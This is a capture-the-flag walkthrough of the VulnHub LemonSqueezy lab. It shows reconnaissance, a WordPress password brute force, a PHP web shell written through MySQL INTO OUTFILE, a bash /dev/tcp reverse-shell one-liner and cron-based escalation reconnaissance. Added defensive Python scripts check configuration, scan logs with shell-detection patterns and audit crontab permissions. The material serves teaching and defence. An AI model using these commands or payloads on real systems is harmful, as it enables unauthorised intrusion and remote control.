LEMONSQUEEZY: 1 [writing a shell through MySQL]

Environment setup

Target machine download address
https://vulnhub.com/entry/lemonsqueezy-1%2C473/


Information gathering

┌──(root㉿kali)-[/home/test/桌面/lemmon]
└─# nmap -sP 192.168.47.1/24 --min-rate 3333
Starting Nmap 7.92 ( https://nmap.org ) at 2024-03-20 14:02 CST
Stats: 0:00:06 elapsed; 0 hosts completed (0 up), 255 undergoing ARP Ping Scan
Parallel DNS resolution of 4 hosts. Timing: About 0.00% done
Nmap scan report for 192.168.47.1
Host is up (0.00061s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.47.2
Host is up (0.00010s latency).
MAC Address: 00:50:56:EC:64:22 (VMware)
Nmap scan report for 192.168.47.177
Host is up (0.00012s latency).
MAC Address: 00:0C:29:E2:78:CF (VMware)
Nmap scan report for 192.168.47.254
Host is up (0.000075s latency).
MAC Address: 00:50:56:FD:24:81 (VMware)
Nmap scan report for 192.168.47.156
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 8.43 seconds

The target's IP address is

192.168.47.177

Run a full port scan to see which ports and services are open

┌──(root㉿kali)-[/home/test/桌面/lemmon]
└─# nmap -p- 192.168.47.177 -A -T4 --min-rate 3333
Starting Nmap 7.92 ( https://nmap.org ) at 2024-03-20 14:03 CST
Nmap scan report for 192.168.47.177
Host is up (0.00021s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.25 (Debian)
MAC Address: 00:0C:29:E2:78:CF (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.22 ms 192.168.47.177

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.01 seconds

Only HTTP is open, so there is little to work with.
It serves the Apache default page.
Check whether a robots.txt exists.
A manual check shows there is none.
Run a directory scan.

dirb directory scan

Scan with dirb's small wordlist (dirb scans breadth-first, then descends into each directory it finds)

┌──(root㉿kali)-[/home/test/桌面/lemmon]
└─# dirb http://192.168.47.177/ /usr/share/wordlists/dirb/small.txt 

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed Mar 20 14:06:54 2024
URL_BASE: http://192.168.47.177/
WORDLIST_FILES: /usr/share/wordlists/dirb/small.txt

-----------------

GENERATED WORDS: 959                                                           

---- Scanning URL: http://192.168.47.177/ ----
==> DIRECTORY: http://192.168.47.177/javascript/                                                                                                       
==> DIRECTORY: http://192.168.47.177/manual/                                                                                                           
==> DIRECTORY: http://192.168.47.177/phpmyadmin/                                                                                                       
==> DIRECTORY: http://192.168.47.177/wordpress/                                                                                                        
                                                                                                                                                       
---- Entering directory: http://192.168.47.177/javascript/ ----
                                                                                                                                                       
---- Entering directory: http://192.168.47.177/manual/ ----
==> DIRECTORY: http://192.168.47.177/manual/en/                                                                                                        
==> DIRECTORY: http://192.168.47.177/manual/es/                                                                                                        
==> DIRECTORY: http://192.168.47.177/manual/images/                                                                                                    
==> DIRECTORY: http://192.168.47.177/manual/style/                                                                                                     
                                                                                                                                                       
---- Entering directory: http://192.168.47.177/phpmyadmin/ ----
==> DIRECTORY: http://192.168.47.177/phpmyadmin/doc/                                                                                                   
==> DIRECTORY: http://192.168.47.177/phpmyadmin/js/                                                                                                    
==> DIRECTORY: http://192.168.47.177/phpmyadmin/libraries/                                                                                             
==> DIRECTORY: http://192.168.47.177/phpmyadmin/setup/                                                                                                 
==> DIRECTORY: http://192.168.47.177/phpmyadmin/sql/                                                                                                   
==> DIRECTORY: http://192.168.47.177/phpmyadmin/templates/                                                                                             
                                                                                                                                                       
---- Entering directory: http://192.168.47.177/wordpress/ ----
                                                                                                                                                       
---- Entering directory: http://192.168.47.177/manual/en/ ----
==> DIRECTORY: http://192.168.47.177/manual/en/misc/                                                                                                   
==> DIRECTORY: http://192.168.47.177/manual/en/ssl/                                                                                                    
                                                                                                                                                       
---- Entering directory: http://192.168.47.177/manual/es/ ----
==> DIRECTORY: http://192.168.47.177/manual/es/misc/                                                                                                   
==> DIRECTORY: http://192.168.47.177/manual/es/ssl/                                                                                                    
                                                                                                                                                       
---- Entering directory: http://192.168.47.177/manual/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                       
---- Entering directory: http://192.168.47.177/manual/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                       
---- Entering directory: http://192.168.47.177/phpmyadmin/doc/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                       
---- Entering directory: http://192.168.47.177/phpmyadmin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                       
---- Entering directory: http://192.168.47.177/phpmyadmin/libraries/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                       
---- Entering directory: http://192.168.47.177/phpmyadmin/setup/ ----
==> DIRECTORY: http://192.168.47.177/phpmyadmin/setup/lib/                                                                                             
                                                                                                                                                       
---- Entering directory: http://192.168.47.177/phpmyadmin/sql/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                       
---- Entering directory: http://192.168.47.177/phpmyadmin/templates/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                       
---- Entering directory: http://192.168.47.177/manual/en/misc/ ----
                                                                                                                                                       
---- Entering directory: http://192.168.47.177/manual/en/ssl/ ----
                                                                                                                                                       
---- Entering directory: http://192.168.47.177/manual/es/misc/ ----
                                                                                                                                                       
---- Entering directory: http://192.168.47.177/manual/es/ssl/ ----
                                                                                                                                                       
---- Entering directory: http://192.168.47.177/phpmyadmin/setup/lib/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Wed Mar 20 14:07:04 2024
DOWNLOADED: 11508 - FOUND: 0
                                                                                                                                                        
┌──(root㉿kali)-[/home/test/桌面/lemmon]
└─# 

Several directories were found

==> DIRECTORY: http://192.168.47.177/javascript/                                                                                                       
==> DIRECTORY: http://192.168.47.177/manual/                                                                                                           
==> DIRECTORY: http://192.168.47.177/phpmyadmin/                                                                                                       
==> DIRECTORY: http://192.168.47.177/wordpress/     

Visiting /manual shows the Apache default manual pages.

Visiting /phpmyadmin requires a username and password.

Visit /wordpress.

wpscan scan

Start with WordPress, since there is a dedicated scanner for it:
http://192.168.47.177/wordpress/

┌──(root㉿kali)-[/home/test/桌面/lemmon]
└─# wpscan --url http://192.168.47.177/wordpress/
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
                               
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://192.168.47.177/wordpress/ [192.168.47.177]
[+] Started: Wed Mar 20 14:11:45 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.25 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.47.177/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.47.177/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.47.177/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.47.177/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.8.9 identified (Insecure, released on 2019-03-13).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.47.177/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.8.9'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.47.177/wordpress/, Match: 'WordPress 4.8.9'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <=========================================================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Mar 20 14:11:50 2024
[+] Requests Done: 180
[+] Cached Requests: 4
[+] Data Sent: 46.925 KB
[+] Data Received: 21.056 MB
[+] Memory used: 223.922 MB
[+] Elapsed time: 00:00:05

This yields some information.
Next, enumerate users.

┌──(root㉿kali)-[/home/test/桌面/lemmon]
└─# wpscan --url http://192.168.47.177/wordpress/ -e u         
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.47.177/wordpress/ [192.168.47.177]
[+] Started: Wed Mar 20 14:20:28 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.25 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.47.177/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.47.177/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.47.177/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.47.177/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.8.9 identified (Insecure, released on 2019-03-13).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.47.177/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.8.9'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.47.177/wordpress/, Match: 'WordPress 4.8.9'

[i] The main theme could not be detected.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <==========================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] orange
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] lemon
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Mar 20 14:20:28 2024
[+] Requests Done: 14
[+] Cached Requests: 41
[+] Data Sent: 3.992 KB
[+] Data Received: 11.639 KB
[+] Memory used: 161.723 MB
[+] Elapsed time: 00:00:00
                                                                                                                                                        
┌──(root㉿kali)-[/home/test/桌面/lemmon]
└─# 

There are two users:

orange
lemon

Try brute-forcing the users' passwords.

One user's password is recovered:

┌──(root㉿kali)-[/home/test/桌面/lemmon]
└─# wpscan --url http://192.168.47.177/wordpress/ -e u -P /usr/share/wordlists/rockyou.txt   
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.47.177/wordpress/ [192.168.47.177]
[+] Started: Wed Mar 20 14:25:39 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.25 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.47.177/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.47.177/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.47.177/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.47.177/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.8.9 identified (Insecure, released on 2019-03-13).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.47.177/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.8.9'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.47.177/wordpress/, Match: 'WordPress 4.8.9'

[i] The main theme could not be detected.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <==========================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] orange
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] lemon
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] Performing password attack on Xmlrpc against 2 user/s
[SUCCESS] - orange / ginger                                                                                                                             
^Cying lemon / money Time: 00:00:06 <                                                                           > (875 / 28688947)  0.00%  ETA: 56:22:35
[!] Valid Combinations Found:
 | Username: orange, Password: ginger

[!] No WPScan API Token given, as a result vulnerability data has not been output.                              > (880 / 28688947)  0.00%  ETA: 56:21:29
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Mar 20 14:25:48 2024
[+] Requests Done: 900
[+] Cached Requests: 42
[+] Data Sent: 483.302 KB
[+] Data Received: 545.76 KB
[+] Memory used: 153.785 MB
[+] Elapsed time: 00:00:09

Scan Aborted: Canceled by User
                                                                                                                                                        
┌──(root㉿kali)-[/home/test/桌面/lemmon]
└─# 

Try logging in to both systems, WordPress and phpMyAdmin, with
orange / ginger


The WordPress login succeeds, but very few features are available, so this is probably not an administrator account.

The phpMyAdmin login does not work with these credentials.

During information gathering, the following string, which looks very much like a password, was found:
n0t1n@w0rdl1st!

Try logging in to phpMyAdmin with it.

Login succeeded!

Here lemon's password hash can be overwritten directly in the database, since orange's password (and therefore a hash known to be valid) is already in hand.
Successfully logged in as lemon.

Writing a shell via phpMyAdmin

The original plan was to start from the WordPress admin panel, but if the phpMyAdmin account has file-write privileges, a shell can be written directly from the database.

Writing directly into Apache's default document root fails: permission denied.

What about the WordPress directory?

select '<?php phpinfo();system($_GET[1]); ?>' into outfile '/var/www/html/wordpress/1.php'


Shell obtained.
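The server-side control that stops this step is MySQL/MariaDB's secure_file_priv setting (together with not granting the FILE privilege to the account phpMyAdmin uses): an empty value leaves SELECT ... INTO OUTFILE free to write anywhere the mysqld process can, a directory confines it to that directory, and on MySQL 5.7+ the literal NULL disables file import/export. The following is an added example, not part of the original walkthrough: a small Python checker that parses a my.cnf fragment and classifies the setting. Both configuration snippets are constructed, one weak and one hardened, and /var/lib/mysql-files is just the conventional directory choice.

```python
# Added example: classify the secure_file_priv setting in a my.cnf fragment.

def parse_mycnf(text):
    """Return {section: {option: value}} for an INI-style my.cnf.
    Option names are normalised so secure-file-priv and secure_file_priv compare equal."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and whitespace
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif current is not None:
            key, _, value = line.partition("=")
            key = key.strip().lower().replace("-", "_")
            sections[current][key] = value.strip().strip('"\'')
    return sections


def secure_file_priv_finding(text):
    """Return (verdict, explanation) for the effective secure_file_priv value.
    Later server sections override earlier ones, as the server itself merges them."""
    cfg = parse_mycnf(text)
    server = {}
    for name in ("mysqld", "mariadb", "server"):
        server.update(cfg.get(name, {}))
    if "secure_file_priv" not in server:
        return ("review", "secure_file_priv not set; MariaDB defaults to unrestricted, "
                          "MySQL's default depends on the build, so confirm with SHOW VARIABLES")
    value = server["secure_file_priv"]
    if value == "":
        return ("weak", "secure_file_priv is empty: INTO OUTFILE may write anywhere mysqld can reach")
    if value.upper() == "NULL":
        return ("hardened", "file import/export disabled")
    return ("hardened", "file import/export confined to %s" % value)


# Constructed configuration fragments (not taken from the target machine).
WEAK_CNF = """\
[mysqld]
user = mysql
secure-file-priv = ""
"""

HARDENED_CNF = """\
[mysqld]
user = mysql
secure_file_priv = /var/lib/mysql-files
"""

if __name__ == "__main__":
    for label, cnf in (("weak", WEAK_CNF), ("hardened", HARDENED_CNF)):
        print(label, secure_file_priv_finding(cnf))
```

Even with a directory configured, the write in this walkthrough only succeeded because the WordPress directory was writable by the mysqld process; keeping the web root owned by a user other than mysql and denying FILE to application accounts closes the path independently of this setting.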

Reverse shell

Next, get a reverse shell.

bash -c "bash -i >& /dev/tcp/192.168.47.156/9999 0>&1"

URL-encode the command so that the & characters are not interpreted as query-string separators.

The reverse shell connects back.
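On the defensive side, both the XML-RPC password attack that wpscan ran earlier and the URL-encoded reverse-shell request above leave distinctive traces in Apache's access log. The following is an added example, not part of the original walkthrough: a Python script that parses combined-format log lines and flags (a) one client sending a burst of POSTs to xmlrpc.php and (b) any request whose decoded query string carries a shell-launch pattern. The log lines are constructed to resemble this walkthrough's traffic, and the threshold, window and patterns are illustrative choices.

```python
# Added example: two detections over Apache combined-format access log lines.
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote_plus, urlsplit

# client ident user [time] "METHOD target PROTOCOL" status size ... (referer/UA ignored)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Shell-launch fragments that no legitimate query string on this site should contain;
# /dev/tcp/ and "bash -i" are the forms used in the walkthrough above.
SHELL_PATTERNS = [re.compile(p) for p in (
    r"/dev/tcp/", r"\bbash\s+-i\b", r"\b(?:nc|ncat)\b.*\s-e\s", r"\b(?:ba)?sh\s+-c\b")]


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["time"] = datetime.strptime(entry["time"], "%d/%b/%Y:%H:%M:%S %z")
    return entry


def xmlrpc_bursts(entries, threshold=10, window_seconds=60):
    """Return {ip: count} for clients whose POSTs to xmlrpc.php exceed `threshold`
    inside any sliding window of `window_seconds`."""
    by_ip = defaultdict(list)
    for e in entries:
        if e["method"] == "POST" and urlsplit(e["target"]).path.endswith("/xmlrpc.php"):
            by_ip[e["ip"]].append(e["time"])
    flagged = {}
    for ip, times in by_ip.items():
        times.sort()
        start, best = 0, 0
        for end in range(len(times)):
            while (times[end] - times[start]).total_seconds() > window_seconds:
                start += 1
            best = max(best, end - start + 1)
        if best > threshold:
            flagged[ip] = best
    return flagged


def shell_in_query(entries):
    """Return (ip, path, decoded_query) for requests whose decoded query string
    matches a shell-launch pattern; decoding first defeats the URL-encoding trick."""
    hits = []
    for e in entries:
        parts = urlsplit(e["target"])
        decoded = unquote_plus(parts.query)
        if any(p.search(decoded) for p in SHELL_PATTERNS):
            hits.append((e["ip"], parts.path, decoded))
    return hits


def analyse(lines):
    entries = [e for e in map(parse_line, lines) if e]
    return {"xmlrpc_bursts": xmlrpc_bursts(entries), "shell_requests": shell_in_query(entries)}


# Constructed log lines modelled on the walkthrough's traffic; not a real capture.
SAMPLE_LOG = [
    '192.168.47.156 - - [20/Mar/2024:14:25:%02d +0800] "POST /wordpress/xmlrpc.php HTTP/1.1" '
    '200 403 "-" "WPScan v3.8.22"' % s
    for s in range(40, 52)
] + [
    '192.168.47.10 - - [20/Mar/2024:14:30:01 +0800] "GET /wordpress/?s=lemon+juice HTTP/1.1" '
    '200 5120 "-" "Mozilla/5.0"',
    '192.168.47.156 - - [20/Mar/2024:14:31:07 +0800] "GET /wordpress/1.php?1=bash%20-c%20%22bash'
    '%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.47.156%2F9999%200%3E%261%22 HTTP/1.1" '
    '200 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for name, result in analyse(SAMPLE_LOG).items():
        print(name, result)
```

Running the block against the sample flags 192.168.47.156 twice: once for twelve xmlrpc.php POSTs in twelve seconds, and once for the decoded query `1=bash -c "bash -i >& /dev/tcp/192.168.47.156/9999 0>&1"` aimed at the freshly written 1.php. In production the same decode-then-match step belongs in a WAF rule or a log pipeline, and the xmlrpc.php count is a cheap signal for rate limiting or for disabling XML-RPC where it is not needed.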

Upgrade the shell

┌──(root㉿kali)-[/home/test/桌面/lemmon]
└─# nc -lvvp 9999                                 
listening on [any] 9999 ...
192.168.47.177: inverse host lookup failed: Unknown host
connect to [192.168.47.156] from (UNKNOWN) [192.168.47.177] 45450
bash: cannot set terminal process group (557): Inappropriate ioctl for device
bash: no job control in this shell
www-data@lemonsqueezy:/var/www/html/wordpress$ tty
tty
not a tty
www-data@lemonsqueezy:/var/www/html/wordpress$ which python
which python
/usr/bin/python
www-data@lemonsqueezy:/var/www/html/wordpress$ python -c "import pty;pty.spawn('/bin/bash')"
<ress$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@lemonsqueezy:/var/www/html/wordpress$ tty
tty
/dev/pts/0
www-data@lemonsqueezy:/var/www/html/wordpress$ export TERM=xterm
export TERM=xterm
www-data@lemonsqueezy:/var/www/html/wordpress$ clear

Upgrade to a proper tty and set TERM so that clear works.

Check for SUID binaries that could be used for privilege escalation

www-data@lemonsqueezy:/var/www/html/wordpress$ find / -perm -4000 -type f 2>/dev/null
/null/ -perm -4000 -type f 2>/dev/
/usr/sbin/pppd
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/chfn
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/xorg/Xorg.wrap
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/bin/ntfs-3g
/bin/umount
/bin/su
/bin/ping
/bin/mount
/bin/fusermount

The user flag is in /var/www

cd www
www-data@lemonsqueezy:/var/www$ ls
ls
html  user.txt
www-data@lemonsqueezy:/var/www$ cat user.txt
cat user.txt
TXVzaWMgY2FuIGNoYW5nZSB5b3VyIGxpZmUsIH
www-data@lemonsqueezy:/var/www$ echo 'TXVzaWMgY2FuIGNoYW5nZSB5b3VyIGxpZmUsIH' | base64 -d
base64 -dzaWMgY2FuIGNoYW5nZSB5b3VyIGxpZmUsIH' | b
Music can change your life, base64: invalid input
www-data@lemonsqueezy:/var/www$ 

Privilege escalation via a cron job

Look at the scheduled tasks

www-data@lemonsqueezy:/var/www$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/2 *   * * *   root    /etc/logrotate.d/logrotate
#

One entry stands out from the defaults:
/etc/logrotate.d/logrotate

Check this file's permissions: if it is 777, every user can edit it, and whatever is put in it runs as root when cron fires.

It really is 777, so it can be edited directly to escalate privileges.
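The check just described, generalised to every root job in a system crontab, as an added example that is not from the original post: parse the job lines, extract the absolute paths each command references, and flag any that are group- or world-writable. The crontab text is the one shown above; the file modes are supplied through an injectable stat function so the script runs offline, and calling audit_crontab without that argument audits the live host.

```python
# Added example: find root cron jobs whose referenced files are writable by others.
import os
import shlex
import stat

# Sample: the /etc/crontab shown above (constructed copy for the demo).
SAMPLE_CRONTAB = """\
# m h dom mon dow user  command
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
*/2 *   * * *   root    /etc/logrotate.d/logrotate
"""


def parse_system_crontab(text):
    """Return [(user, command)] for each job line in a system crontab (/etc/crontab or
    /etc/cron.d/*), skipping comments, blank lines and VAR=value assignments."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 6)          # m h dom mon dow user command
        if len(fields) < 7 or "=" in fields[0]:
            continue
        jobs.append((fields[5], fields[6]))
    return jobs


def referenced_paths(command):
    """Absolute paths that appear as words in the command (script, run-parts dir, ...)."""
    flat = command.replace("&&", " ").replace("||", " ").replace(";", " ")
    try:
        words = shlex.split(flat)
    except ValueError:                        # unbalanced quotes: fall back to a plain split
        words = flat.split()
    return [w for w in words if w.startswith("/") and w != "/"]


def writable_by_others(mode):
    """True if the group or world write bit is set (the 777 case above)."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_crontab(text, stat_fn=os.stat):
    """Return [(user, path, mode)] for root jobs whose referenced paths are writable
    by group/other; paths that do not exist are skipped."""
    findings = []
    for user, command in parse_system_crontab(text):
        if user != "root":
            continue
        for path in referenced_paths(command):
            try:
                st = stat_fn(path)
            except OSError:
                continue
            if writable_by_others(st.st_mode):
                findings.append((user, path, oct(stat.S_IMODE(st.st_mode))))
    return findings


class _FakeStat:
    def __init__(self, mode):
        self.st_mode = mode


# Constructed modes standing in for the target: the logrotate script is 0777,
# the cron.hourly directory is the normal 0755; everything else "does not exist".
FAKE_MODES = {
    "/etc/logrotate.d/logrotate": stat.S_IFREG | 0o777,
    "/etc/cron.hourly": stat.S_IFDIR | 0o755,
}


def fake_stat(path):
    if path not in FAKE_MODES:
        raise FileNotFoundError(path)
    return _FakeStat(FAKE_MODES[path])


if __name__ == "__main__":
    print(audit_crontab(SAMPLE_CRONTAB, fake_stat))      # offline demo
    if os.path.exists("/etc/crontab"):                   # live host audit
        with open("/etc/crontab") as fh:
            print(audit_crontab(fh.read()))
```

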